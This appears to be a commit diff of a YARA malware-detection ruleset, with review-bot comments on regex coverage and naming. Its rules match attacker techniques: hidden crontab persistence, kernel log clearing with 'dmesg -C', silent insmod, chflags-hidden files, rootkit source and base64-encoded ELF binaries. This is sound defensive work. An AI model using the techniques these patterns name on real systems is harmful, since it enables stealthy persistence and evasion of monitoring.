120 files changed, 436 insertions(+), 227 deletions(-) create mode 100644 rules/data/embedded/embedded-base64-elf.yara rename rules/discover/{system/system_network.yara => multiple.yara} (100%) create mode 100644 rules/discover/network/connectivity.yara rename 
rules/discover/network/{interface-get.yara => interface.yara} (100%) rename rules/discover/system/{cpu-info.yara => cpu.yara} (100%) create mode 100644 rules/discover/system/dmesg.yara rename rules/discover/system/{hardware-info.yara => hardware.yara} (100%) rename rules/discover/system/{hostname-get.yara => hostname.yara} (100%) rename rules/discover/system/{hostinfo_collector.yara => multiple.yara} (100%) create mode 100644 rules/evasion/file/attr/chflags.yara create mode 100644 rules/evasion/file/location/multiple.yara create mode 100644 rules/evasion/indicator_blocking/hidden_window.yara create mode 100644 rules/evasion/logging/dmesg.yara rename rules/evasion/rootkit/{linux_kernel.yara => kernel.yara} (100%) delete mode 100644 rules/evasion/rootkit/posix_userspace.yara rename rules/evasion/rootkit/{linux_userspace.yara => userspace.yara} (94%) delete mode 100644 rules/persist/cron/echo_crontab.yara create mode 100644 rules/persist/cron/etc_cron_d.yara delete mode 100644 rules/persist/cron/hidden_crontab.yara rename rules/persist/cron/{crontab.yara => tab.yara} (64%) rename rules/persist/kernel_module/{module-load.yara => insert.yara} (81%) create mode 100644 rules/sus/geopolitics.yara diff --git a/pkg/action/testdata/scan_archive b/pkg/action/testdata/scan_archive index 25eb1da4c..0b61fe87b 100644 --- a/pkg/action/testdata/scan_archive +++ b/pkg/action/testdata/scan_archive @@ -25,8 +25,9 @@ discover/network/interface_list: medium discover/network/mac_address: medium discover/network/netstat: medium discover/processes/pgrep: medium -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/dmesg: low +discover/system/hostname: low discover/system/platform: low discover/user/HOME: low discover/user/USER: low diff --git a/rules/c2/addr/url.yara b/rules/c2/addr/url.yara index 430344def..49d3a22fc 100644 --- a/rules/c2/addr/url.yara +++ b/rules/c2/addr/url.yara 
@@ -53,20 +53,20 @@ rule http_url_with_question: medium { filesize < 256KB and any of ($f*) and $ref and none of ($not*) } -rule binary_php_url_with_question: high { +rule binary_url_with_question: high { meta: - description = "contains hardcoded endpoint with a question mark" + description = "binary contains hardcoded URL with question mark" strings: - $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ + $ref = /https*:\/\/[\w\.\/]{8,160}\.(asp|php|exe|dll)\?[\w\=\&]{0,32}/ condition: filesize < 150MB and elf_or_macho and $ref } -rule script_php_url_with_question: high { +rule script_url_with_question: high { meta: - description = "contains hardcoded endpoint with a question mark" + description = "script contains hardcoded URL with question mark" strings: $f_import = "import" fullword @@ -77,7 +77,7 @@ rule script_php_url_with_question: high { $f_requests_post = "requests.post" fullword $f_urllib = "urllib.request" fullword $f_urlopen = "urlopen" fullword - $ref = /https*:\/\/[\w\.\/]{8,160}\.php\?[\w\=\&]{0,32}/ + $ref = /https*:\/\/[\w\.\/]{8,160}\.(asp|php|exe|dll)\?[\w\=\&]{0,32}/ condition: filesize < 256KB and any of ($f*) and $ref diff --git a/rules/data/embedded/embedded-base64-elf.yara b/rules/data/embedded/embedded-base64-elf.yara new file mode 100644 index 000000000..350411a80 --- /dev/null +++ b/rules/data/embedded/embedded-base64-elf.yara @@ -0,0 +1,10 @@ +rule base64_elf: high { + meta: + description = "Contains base64 encoded ELF binary" + + strings: + $header = "f0VMRgEBAQ" + + condition: + $header +} diff --git a/rules/discover/system/system_network.yara b/rules/discover/multiple.yara similarity index 100% rename from rules/discover/system/system_network.yara rename to rules/discover/multiple.yara diff --git a/rules/discover/network/connectivity.yara b/rules/discover/network/connectivity.yara new file mode 100644 index 000000000..02e2f5114 --- /dev/null +++ b/rules/discover/network/connectivity.yara 
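Review bot: The new extension alternation `\.(asp|php|exe|dll)\?` in `binary_url_with_question` does not match `.aspx?` endpoints, because `asp` must be followed directly by the `?`; `(aspx?|php|jsp|exe|dll)` would cover both ASP forms and JSP. The same regex is duplicated in `script_url_with_question` in the second hunk of this file, so both copies need the change, and a single shared `$ref` definition in a private rule would keep them from drifting apart again. The first hunk opens inside `http_url_with_question`, whose body starts outside the hunk.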
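Review bot: `$header = "f0VMRgEBAQ"` is the base64 encoding of `\x7fELF\x01\x01\x01` and so only covers 32-bit little-endian ELF; a 64-bit LE header (`\x7fELF\x02\x01\x01`) encodes to `f0VMRgIBAQ` and is missed, which is the common case on x86-64. Adding `$header64 = "f0VMRgIBAQ"` and changing the condition to `any of them` closes that gap. Base64 of an embedded ELF only contains either literal when the header begins at an offset that is a multiple of 3 in the encoded input, so a miss here is not evidence that no encoded ELF is present. The rule also has no `filesize` bound, unlike the other rules in this commit.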
@@ -0,0 +1,11 @@ + +rule network_connectivity : low { + meta: + description = "checks Internet connectivity" + + strings: + $ref = "http://www.msftncsi.com/ncsi.txt" + + condition: + any of them +} diff --git a/rules/discover/network/interface-get.yara b/rules/discover/network/interface.yara similarity index 100% rename from rules/discover/network/interface-get.yara rename to rules/discover/network/interface.yara diff --git a/rules/discover/process/name.yara b/rules/discover/process/name.yara index 7238cff81..eb1a72e48 100644 --- a/rules/discover/process/name.yara +++ b/rules/discover/process/name.yara @@ -1,4 +1,4 @@ -rule progname: medium { +rule progname: low { meta: description = "get the current process name" ref = "https://linux.die.net/man/3/program_invocation_short_name" diff --git a/rules/discover/system/cpu-info.yara b/rules/discover/system/cpu.yara similarity index 100% rename from rules/discover/system/cpu-info.yara rename to rules/discover/system/cpu.yara diff --git a/rules/discover/system/dev_full.yara b/rules/discover/system/dev_full.yara index 5cf54b19a..ee88bdd61 100644 --- a/rules/discover/system/dev_full.yara +++ b/rules/discover/system/dev_full.yara @@ -1,4 +1,4 @@ -rule dev_full: medium linux { +rule dev_full: low linux { meta: description = "tests full disk behavior" diff --git a/rules/discover/system/dmesg.yara b/rules/discover/system/dmesg.yara new file mode 100644 index 000000000..d702f0060 --- /dev/null +++ b/rules/discover/system/dmesg.yara @@ -0,0 +1,10 @@ +rule dmesg { + meta: + description = "accesses the kernel log ring buffer" + + strings: + $dmesg = "dmesg" fullword + + condition: + any of them +} \ No newline at end of file diff --git a/rules/discover/system/hardware-info.yara b/rules/discover/system/hardware.yara similarity index 100% rename from rules/discover/system/hardware-info.yara rename to rules/discover/system/hardware.yara 
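Review bot: `rule dmesg {` carries no severity tag and no `filesize` bound, while the neighbouring rules in this change (`network_connectivity : low`, `progname: low`, `dev_full: low`) state theirs explicitly; the updated expectation `discover/system/dmesg: low` suggests `rule dmesg: low {` is the intent, and writing it in the rule makes that visible. A bare `"dmesg" fullword` also fires on any help text or manual page that mentions the command, which is fine at low severity but worth a comment. The file lacks a trailing newline (`\ No newline at end of file`).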
diff --git a/rules/discover/system/hostname-get.yara b/rules/discover/system/hostname.yara similarity index 100% rename from rules/discover/system/hostname-get.yara rename to rules/discover/system/hostname.yara diff --git a/rules/discover/system/hostinfo_collector.yara b/rules/discover/system/multiple.yara similarity index 100% rename from rules/discover/system/hostinfo_collector.yara rename to rules/discover/system/multiple.yara diff --git a/rules/evasion/file/attr/chflags.yara b/rules/evasion/file/attr/chflags.yara new file mode 100644 index 000000000..a562cbdd7 --- /dev/null +++ b/rules/evasion/file/attr/chflags.yara @@ -0,0 +1,11 @@ +rule chflags_hidden : high { + meta: + description = "hides files using chflags" + ref = "https://man.freebsd.org/cgi/man.cgi?chflags(1)" + + strings: + $chflags = /chflags.{0,3} hidden [\w\.\/]{0,24}/ + + condition: + any of them +} diff --git a/rules/evasion/file/location/multiple.yara b/rules/evasion/file/location/multiple.yara new file mode 100644 index 000000000..ee1f07fb2 --- /dev/null +++ b/rules/evasion/file/location/multiple.yara @@ -0,0 +1,19 @@ +rule multiple_elf: high linux { + meta: + description = "references multiple system paths, may be trying to hide content" + + strings: + $ = /\/dev\/shm\/[\%\w\-\/\.]{0,64}/ + $ = /\/dev\/mqueue\/[\%\w\-\/\.]{0,64}/ + $ = /\/var\/tmp\/[\%\w\-\/\.]{0,64}/ + $ = /\/tmp\/[\%\w\-\/\.]{0,64}/ fullword + $ = /\/bin\/[\%\w\-\/\.]{0,64}/ fullword + $ = /\/usr\/bin\/[\%\w\-\/\.]{0,64}/ + $ = /\/etc\/cron\.d[\%\w\-\/\.]{0,64}/ + $ = /\/etc\/crontab/ + $ = /\/var\/log\/[\%\w\-\/\.]{0,64}/ + $ = /\/var\/spool\/[\%\w\-\/\.]{0,64}/ + + condition: + filesize < 1MB and uint32(0) == 1179403647 and 80% of them +} diff --git a/rules/evasion/indicator_blocking/hidden_window.yara b/rules/evasion/indicator_blocking/hidden_window.yara new file mode 100644 index 000000000..e17c82436 --- /dev/null +++ b/rules/evasion/indicator_blocking/hidden_window.yara 
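Review bot: `uint32(0) == 1179403647` in `multiple_elf` is the little-endian `\x7fELF` magic, but that is not readable from the decimal literal; `uint32(0) == 0x464C457F` with a short comment says what is being checked. Note that `/\/etc\/cron\.d[\%\w\-\/\.]{0,64}/` has no separator after `cron.d`, so it also matches `/etc/cron.daily` and `/etc/cron.hourly`; that may be intended since the rule counts path families, but a comment would prevent a later "fix" from narrowing it by accident.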
@@ -0,0 +1,54 @@
+
+rule subprocess_CREATE_NO_WINDOW: medium {
+ meta:
+ description = "runs commands, hides windows"
+
+ strings:
+ $sub = "subprocess"
+ $no_window = "CREATE_NO_WINDOW"
+
+ condition:
+ filesize < 32KB and all of them
+}
+
+private rule pythonSetup {
+ strings:
+ $if_distutils = /from distutils.core import .{0,32}setup/
+ $if_setuptools = /from setuptools import .{0,32}setup/
+ $i_setuptools = "import setuptools"
+ $setup = "setup("
+
+ $not_setup_example = ">>> setup("
+ $not_setup_todict = "setup(**config.todict()"
+ $not_import_quoted = "\"from setuptools import setup"
+ $not_setup_quoted = "\"setup(name="
+ $not_distutils = "from distutils.errors import"
+
+ condition:
+ filesize < 128KB and $setup and any of ($i*) in (0..1024) and none of ($not*)
+}
+
+rule subprocess_CREATE_NO_WINDOW_setuptools: high {
+ meta:
+ description = "runs commands, hides windows"
+
+ strings:
+ $sub = "subprocess"
+ $no_window = "CREATE_NO_WINDOW"
+
+ condition:
+ filesize < 32KB and pythonSetup and all of them
+}
+
+rule subprocess_CREATE_NO_WINDOW_high: high {
+ meta:
+ description = "runs commands, hides windows"
+
+ strings:
+ $s_sub = "subprocess"
+ $s_no_window = "CREATE_NO_WINDOW"
+
+ $o_discord = "discordapp.com"
+ condition:
+ filesize < 32KB and all of ($s*) and any of ($o*)
+}
\ No newline at end of file
diff --git a/rules/evasion/logging/dmesg.yara b/rules/evasion/logging/dmesg.yara
new file mode 100644
index 000000000..2d5e6f5e5
--- /dev/null
+++ b/rules/evasion/logging/dmesg.yara
@@ -0,0 +1,13 @@
+rule dmesg_clear: critical linux {
+ meta:
+ description = "clears the kernel log ring buffer"
+
+ strings:
+ $ = "dmesg -C" fullword
+ $ = "dmesg -c" fullword
+ $ = "dmesg --clear" fullword
+ $ = "dmesg --read-clear" fullword
+
+ condition:
+ filesize < 150MB and any of them
+}
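Review bot: The three rules `subprocess_CREATE_NO_WINDOW`, `subprocess_CREATE_NO_WINDOW_setuptools` and `subprocess_CREATE_NO_WINDOW_high` all carry the identical `description = "runs commands, hides windows"`, so a report cannot show why the higher severity applied; the `_setuptools` rule could use `description = "runs commands with hidden window from a Python setup script"` and the `_high` rule `description = "runs commands with hidden window, references Discord"`. The medium rule has no exclusion, so it fires alongside whichever high rule also matches the same file. If `pythonSetup` already exists as a private rule elsewhere in the ruleset, this is a second copy that can drift from it. The file also lacks a trailing newline.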
diff --git a/rules/evasion/rootkit/linux_kernel.yara b/rules/evasion/rootkit/kernel.yara similarity index 100% rename from rules/evasion/rootkit/linux_kernel.yara rename to rules/evasion/rootkit/kernel.yara diff --git a/rules/evasion/rootkit/posix_userspace.yara b/rules/evasion/rootkit/posix_userspace.yara deleted file mode 100644 index 8ae649c5c..000000000 --- a/rules/evasion/rootkit/posix_userspace.yara +++ /dev/null @@ -1,12 +0,0 @@ -rule readdir_intercept_source: high { - meta: - description = "userland rootkit source designed to hide files (DECLARE_READDIR)" - filetypes = "so,c" - - strings: - $declare = "DECLARE_READDIR" - $hide = "hide" - - condition: - filesize < 200KB and all of them -} diff --git a/rules/evasion/rootkit/linux_userspace.yara b/rules/evasion/rootkit/userspace.yara similarity index 94% rename from rules/evasion/rootkit/linux_userspace.yara rename to rules/evasion/rootkit/userspace.yara index e7c42b737..91106a0b2 100644 --- a/rules/evasion/rootkit/linux_userspace.yara +++ b/rules/evasion/rootkit/userspace.yara @@ -1,3 +1,16 @@ +rule readdir_intercept_source: high { + meta: + description = "userland rootkit source designed to hide files (DECLARE_READDIR)" + filetypes = "so,c" + + strings: + $declare = "DECLARE_READDIR" + $hide = "hide" + + condition: + filesize < 200KB and all of them +} + rule readdir_intercept: high { meta: description = "userland rootkit designed to hide files (readdir64)" diff --git a/rules/exec/program/hidden.yara b/rules/exec/program/hidden.yara index 2797027c3..be6cc6a9e 100644 --- a/rules/exec/program/hidden.yara +++ b/rules/exec/program/hidden.yara @@ -1,4 +1,4 @@ -rule relative_hidden_launcher { +rule relative_hidden_launcher : medium { strings: $relative_hidden = /\.\/\.[\w][\w\/\.\_\-]{3,16}/ fullword $x_exec = "exec" diff --git a/rules/impact/remote_access/backdoor.yara b/rules/impact/remote_access/backdoor.yara index 98612b88f..bdc825193 100644 --- a/rules/impact/remote_access/backdoor.yara 
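Review bot: `relative_hidden_launcher` gains a severity but still has no `meta:` block, so unlike the other rules touched in this commit it reports with no description; from the visible strings (a `./.<name>` path plus `exec`) something like `description = "executes a hidden file from a relative path"` fits. The rule's condition is outside the hunk.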
+++ b/rules/impact/remote_access/backdoor.yara @@ -10,7 +10,7 @@ private rule wordlist { filesize < 100MB and 3 of them } -rule backdoor: high { +rule backdoor: medium { meta: description = "References a 'backdoor'" hash_2023_UPX_0c25a05bdddc144fbf1ffa29372481b50ec6464592fdfb7dec95d9e1c6101d0d_elf_x86_64 = "818b80a08418f3bb4628edd4d766e4de138a58f409a89a5fdba527bab8808dd2" diff --git a/rules/impact/remote_access/botnet.yara b/rules/impact/remote_access/botnet.yara index b6062c164..82f1ab9e2 100644 --- a/rules/impact/remote_access/botnet.yara +++ b/rules/impact/remote_access/botnet.yara @@ -1,15 +1,16 @@ rule bot: medium { meta: - description = "References a 'botnet'" + description = "References a 'bot'" strings: - $bot_deployed = "bot deployed" - $botnet = "Botnet" + $BOTDIR = "BOTDIR" + $botdir = "botdir" condition: - filesize < 20MB and any of them + filesize < 1MB and any of them } + rule botnet_high: high { meta: description = "References a 'botnet'" diff --git a/rules/net/dns/dns-over-https.yara b/rules/net/dns/dns-over-https.yara index 255614bc7..b4eb8aada 100644 --- a/rules/net/dns/dns-over-https.yara +++ b/rules/net/dns/dns-over-https.yara @@ -11,6 +11,7 @@ rule doh_refs: medium { $contentType = "application/dns-message" $dnspod = "dnspod" $doh_url = "doh-url" fullword + $cloudflare = "https://9.9.9.9/dns-query" condition: any of them diff --git a/rules/net/ip/spoof.yara b/rules/net/ip/spoof.yara index 5891a27fa..4183e229a 100644 --- a/rules/net/ip/spoof.yara +++ b/rules/net/ip/spoof.yara @@ -7,8 +7,9 @@ rule spoof: medium { strings: $spoof = /[a-zA-Z\-_ ]{0,16}spoof[a-zA-Z\-_ ]{0,16}/ fullword - $Spoof = /[a-zA-Z\-_ ]{0,16}Spoof[a-zA-Z\-_ ]{0,16}/ fullword + $spoof2 = /[a-zA-Z\-_ ]{0,16}Spoof[a-zA-Z\-_ ]{0,16}/ fullword + $not_chk = "Spoofchk" condition: - any of them + any of ($s*) and none of ($not*) } diff --git a/rules/persist/cron/echo_crontab.yara b/rules/persist/cron/echo_crontab.yara deleted file mode 100644 index 3a2ed0633..000000000 
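Review bot: The new `description = "References a 'bot'"` in rule `bot` is broader than what the rule now matches, which is only `BOTDIR`/`botdir`; `description = "References a bot directory (BOTDIR)"` states the actual signal. The two strings could collapse to a single `$botdir = "botdir" nocase`, but that would additionally accept mixed-case spellings, so keep the pair if the exact case is deliberate.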
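Review bot: `$cloudflare = "https://9.9.9.9/dns-query"` is misnamed: 9.9.9.9 is Quad9's resolver, not Cloudflare's, so a match report would point analysts at the wrong provider; `$quad9 = "https://9.9.9.9/dns-query"` fixes that. `doh_refs` starts outside the hunk.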
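Review bot: The exclusion `$not_chk = "Spoofchk"` only covers the capitalised form, while `$spoof` still matches the lowercase `spoofchk` (the spelling iproute2 uses for the VF setting in `ip link` syntax), so ordinary network tooling that spells it that way keeps firing; adding `$not_chk2 = "spoofchk"` next to the existing string, or `$not_chk = "spoofchk" nocase`, covers both. Because `none of ($not*)` suppresses the whole rule, one occurrence of that token silences every other spoof reference in the file, which deserves a comment. `spoof` starts outside the hunk.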
--- a/rules/persist/cron/echo_crontab.yara +++ /dev/null @@ -1,12 +0,0 @@ -rule echo_crontab: high { - meta: - hash_2020_Enigma = "6b2ff7ae79caf306c381a55409c6b969c04b20c8fda25e6d590e0dadfcf452de" - hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819" - hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30" - - strings: - $echo = /echo.{0,10}\* \* \* \*.{0,24}cron[\w\/ \-]{0,16}/ - - condition: - $echo -} diff --git a/rules/persist/cron/etc_cron_d.yara b/rules/persist/cron/etc_cron_d.yara new file mode 100644 index 000000000..00c7cfdb5 --- /dev/null +++ b/rules/persist/cron/etc_cron_d.yara @@ -0,0 +1,12 @@ +rule cron_d_user: high { + meta: + description = "Uses /etc/cron.d to persist" + + strings: + $c_etc_crontab = /\/etc\/cron\.d\/[\w\.\-\%\/]{1,16}/ + + $not_usage = "usage: cron" + + condition: + filesize < 52428800 and any of ($c*) and none of ($not*) +} diff --git a/rules/persist/cron/hidden_crontab.yara b/rules/persist/cron/hidden_crontab.yara deleted file mode 100644 index 9743db792..000000000 --- a/rules/persist/cron/hidden_crontab.yara +++ /dev/null 
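Review bot: `$c_etc_crontab` in `cron_d_user` matches `/etc/cron.d/<name>`, not `/etc/crontab`, so the identifier misleads; `$c_etc_cron_d = /\/etc\/cron\.d\/[\w\.\-\%\/]{1,16}/` names what it matches. `filesize < 52428800` can be written `filesize < 50MB`, the form the other rules in this commit use (`filesize < 150MB`, `filesize < 1MB`). Since the pattern requires at least one character after `/etc/cron.d/`, references to the directory itself are not matched; that may be intended, but a comment would help because at `high` severity a benign installer script that drops a file there is likely to hit this.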
@@ -1,17 +0,0 @@ -rule hidden_crontab: critical { - meta: - description = "persists via a hidden crontab entry" - hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819" - hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30" - hash_2024_Chaos_27cd = "27cdb8d8f64ce395795fdbde10cf3a08e7b217c92b7af89cde22abbf951b9e99" - - strings: - $crontab = "crontab" - $c_periodic_with_user = /\*[\/\d]{0,3} \* \* \* \* [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/ - $c_periodic = /\*[\/\d]{0,3} \* \* \* \* [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/ - $c_nickname_with_user = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/ - $c_nickname = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/ - - condition: - $crontab and any of ($c_*) -} diff --git a/rules/persist/cron/crontab.yara b/rules/persist/cron/tab.yara similarity index 64% rename from rules/persist/cron/crontab.yara rename to rules/persist/cron/tab.yara index 20ac884bc..c3720fe5c 100644 --- a/rules/persist/cron/crontab.yara +++ b/rules/persist/cron/tab.yara @@ -17,7 +17,6 @@ rule crontab_writer: medium { hash_2023_ZIP_server = "b69738c655dee0071b1ce37ab5227018ebce01ba5e90d28bd82d63c46e9e63a4" strings: - $c_etc_crontab = /\/etc\/cron[\/\w\.]{0,32}/ $c_crontab_e = "crontab -" $c_var_spool_cron = "/var/spool/cron" $not_usage = "usage: cron" 
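Review bot: Dropping `$c_etc_crontab = /\/etc\/cron[\/\w\.]{0,32}/` from `crontab_writer` removes the only visible coverage of `/etc/crontab` and of the `/etc/cron.hourly`, `/etc/cron.daily`, `/etc/cron.weekly` and `/etc/cron.monthly` directories: the new `cron_d_user` rule only matches `/etc/cron.d/<name>`, and `multiple_elf` only counts `/etc/crontab` as one of ten paths on ELF files. Keeping a narrower pair, `$c_etc_crontab = "/etc/crontab"` and `$c_etc_cron_periodic = /\/etc\/cron\.(hourly|daily|weekly|monthly)/`, preserves that coverage without the old broad prefix. `crontab_writer` starts outside the hunk.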
@@ -66,3 +65,34 @@ rule crontab_danger_path: high {
 condition:
 filesize < 104857600 and any of them
 }
+
+rule hidden_crontab: critical {
+ meta:
+ description = "persists via a hidden crontab entry"
+ hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819"
+ hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30"
+ hash_2024_Chaos_27cd = "27cdb8d8f64ce395795fdbde10cf3a08e7b217c92b7af89cde22abbf951b9e99"
+
+ strings:
+ $crontab = "crontab"
+ $c_periodic_with_user = /\*[\/\d]{0,3} \* \* \* \* [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
+ $c_periodic = /\*[\/\d]{0,3} \* \* \* \* [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
+ $c_nickname_with_user = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [a-z]{1,12} [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
+ $c_nickname = /\@(reboot|yearly|annually|monthly|weekly|daily|hourly) [\$\w\/]{0,32}\/\.[\%\w\.\-\/]{0,16}/
+
+ condition:
+ $crontab and any of ($c_*)
+}
+
+rule echo_crontab: high {
+ meta:
+ hash_2020_Enigma = "6b2ff7ae79caf306c381a55409c6b969c04b20c8fda25e6d590e0dadfcf452de"
+ hash_2024_Chaos_1d36 = "1d36f4bebd21a01c12fde522defee4c6b4d3d574c825ecc20a2b7a8baa122819"
+ hash_2024_Chaos_1fc4 = "1fc412b47b736f8405992e3744690b58ec4d611c550a1b4f92f08dfdad5f7a30"
+
+ strings:
+ $echo = /echo.{0,10}\* \* \* \*.{0,24}cron[\w\/ \-]{0,16}/
+
+ condition:
+ $echo
+}
diff --git a/rules/persist/kernel_module/module-load.yara b/rules/persist/kernel_module/insert.yara
similarity index 81%
rename from rules/persist/kernel_module/module-load.yara
rename to rules/persist/kernel_module/insert.yara
index 7f64e2059..8efd49b77 100644
--- a/rules/persist/kernel_module/module-load.yara
+++ b/rules/persist/kernel_module/insert.yara
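Review bot: `echo_crontab` is the only rule in this hunk without a `description`, so its matches report with no explanation; from `$echo` something like `description = "writes a crontab entry via echo"` fits. Neither moved rule has a `filesize` bound, unlike `crontab_danger_path` just above (`filesize < 104857600`), so they do not get the early exit the rest of the file relies on for large inputs.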
@@ -1,30 +1,24 @@
-rule init_module: medium linux {
+rule kernel_module_loader: high linux {
 meta:
- description = "Linux kernel module"
- syscall = "init_module"
- capability = "CAP_SYS_MODULE"
- hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf"
- hash_2023_Linux_Malware_Samples_b82d = "b82d4d3d7f3a31bf2ad88315f52cb544aa4d9b786e3db61fdfabd25a790de410"
- hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
- filetypes = "ko,elf,so"
+ description = "loads Linux kernel module via insload"
+ hash_2023_init_d_vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
+ hash_2023_rc0_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
+ hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
 
 strings:
- $ref = "init_module" fullword
+ $insmod = /insmod [ \$\%\w\.\/_-]{1,32}/
 
 condition:
- filesize < 1MB and all of them
+ filesize < 10MB and all of them
 }
 
-rule kernel_module_loader: high linux {
+rule kernel_module_loader_sus: high linux {
 meta:
- description = "loads Linux kernel module via insload"
- hash_2023_init_d_vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
- hash_2023_rc0_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
- hash_2023_rc1_d_K70vm_agent = "663b75b098890a9b8b02ee4ec568636eeb7f53414a71e2dbfbb9af477a4c7c3d"
+ description = "suspiciously loads Linux kernel module via insload"
 
 strings:
- $insmod = /insmod [ \$\%\w\.\/_-]{1,32}\.ko/
-
+ $insmod = /insmod [ \$\%\w\.\/_-]{1,32} .{0,16}\/dev\/null 2\>\&1/
+
 condition:
 filesize < 10MB and all of them
 }
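Review bot: Both descriptions in this hunk say `via insload`, which looks like a typo for `insmod`, the command the `$insmod` regex actually matches; `description = "loads Linux kernel module via insmod"` and `description = "suspiciously loads Linux kernel module via insmod"`. `kernel_module_loader` is also raised to `high` at the same time its regex drops the `\.ko` suffix, and `[ \$\%\w\.\/_-]{1,32}` admits spaces, so prose such as an `insmod` usage message or a man page now satisfies it; keeping `\.ko` in the base rule, or leaving it at `medium`, limits that. Since the `_sus` regex is a strict refinement of the base one, any file that hits `kernel_module_loader_sus` also hits `kernel_module_loader`, which is fine if both are meant to report but worth stating in a comment.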
@@ -41,3 +35,21 @@ rule cha_cha_tests: override linux {
 condition:
 filesize < 2KB and any of them
 }
+
+rule init_module: medium linux {
+ meta:
+ description = "Linux kernel module"
+ syscall = "init_module"
+ capability = "CAP_SYS_MODULE"
+ hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf"
+ hash_2023_Linux_Malware_Samples_b82d = "b82d4d3d7f3a31bf2ad88315f52cb544aa4d9b786e3db61fdfabd25a790de410"
+ hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
+ filetypes = "ko,elf,so"
+
+ strings:
+ $ref = "init_module" fullword
+
+ condition:
+ filesize < 1MB and all of them
+}
+
diff --git a/rules/persist/kernel_module/module.yara b/rules/persist/kernel_module/module.yara
index a0833f10c..ab71b2f1f 100644
--- a/rules/persist/kernel_module/module.yara
+++ b/rules/persist/kernel_module/module.yara
@@ -1,6 +1,8 @@
+import "elf"
+
 rule lkm: medium {
 meta:
- description = "Contains a Linux kernel module"
+ description = "Linux kernel module"
 capability = "CAP_SYS_MODULE"
 hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf"
 hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
@@ -14,6 +16,22 @@ rule lkm: medium {
 all of them
 }
 
+rule lkm_embedded_in_elf: high {
+ meta:
+ description = "Contains embedded Linux kernel module"
+ capability = "CAP_SYS_MODULE"
+ hash_2023_Linux_Malware_Samples_5d63 = "5d637915abc98b21f94b0648c552899af67321ab06fb34e33339ae38401734cf"
+ hash_2023_LQvKibDTq4_diamorphine = "e93e524797907d57cb37effc8ebe14e6968f6bca899600561971e39dfd49831d"
+ hash_2023_LQvKibDTq4_diamorphine_mod = "e394d87045c800a63bd4d295e635ff8a03624255c3fd85fe8e6957807f1cb569"
+
+ strings:
+ $vergmagic = "vermagic="
+ $srcversion = "srcversion="
+
+ condition:
+ elf.type == elf.ET_EXEC and all of them
+}
+
 rule delete_module: medium {
 meta:
 description = "Unload Linux kernel module"
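Review bot: `$vergmagic = "vermagic="` in `lkm_embedded_in_elf` misspells the identifier; `$vermagic = "vermagic="` matches the field it names. The condition `elf.type == elf.ET_EXEC` also excludes position-independent executables, which are `ET_DYN`, so a module embedded in a PIE-built loader is not reported; if those are in scope, `(elf.type == elf.ET_EXEC or elf.type == elf.ET_DYN) and all of them` covers them, at the cost of also matching shared objects that carry the same two fields. No `filesize` bound is set here either, unlike most rules in this commit.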
diff --git a/rules/sus/geopolitics.yara b/rules/sus/geopolitics.yara new file mode 100644 index 000000000..9c40cb51f --- /dev/null +++ b/rules/sus/geopolitics.yara @@ -0,0 +1,9 @@ +rule ukraine: medium { + meta: + description = "Glory to Ukraine!" + strings: + $ref = "слава Украине!" + + condition: + any of them +} diff --git a/rules/sus/malicious.yara b/rules/sus/malicious.yara index 9c4540d06..ff9913619 100644 --- a/rules/sus/malicious.yara +++ b/rules/sus/malicious.yara @@ -5,8 +5,9 @@ rule malicious: medium { strings: $ref = /[a-zA-Z\-_ ]{0,16}malicious[a-zA-Z\-_ ]{0,16}/ fullword + $not_sshd = "attempt by a malicious server" condition: - any of them + $ref and none of ($not*) } rule malici0us: high { diff --git a/tests/does-nothing/does-nothing.simple b/tests/does-nothing/does-nothing.simple index af4355d54..605a4d85a 100644 --- a/tests/does-nothing/does-nothing.simple +++ b/tests/does-nothing/does-nothing.simple @@ -1,8 +1,8 @@ # does-nothing/does-nothing: medium data/encoding/base64: low data/encoding/json: low -discover/system/cpu_info: low -discover/system/hostname_get: low +discover/system/cpu: low +discover/system/hostname: low discover/system/platform: low exec/plugin: low 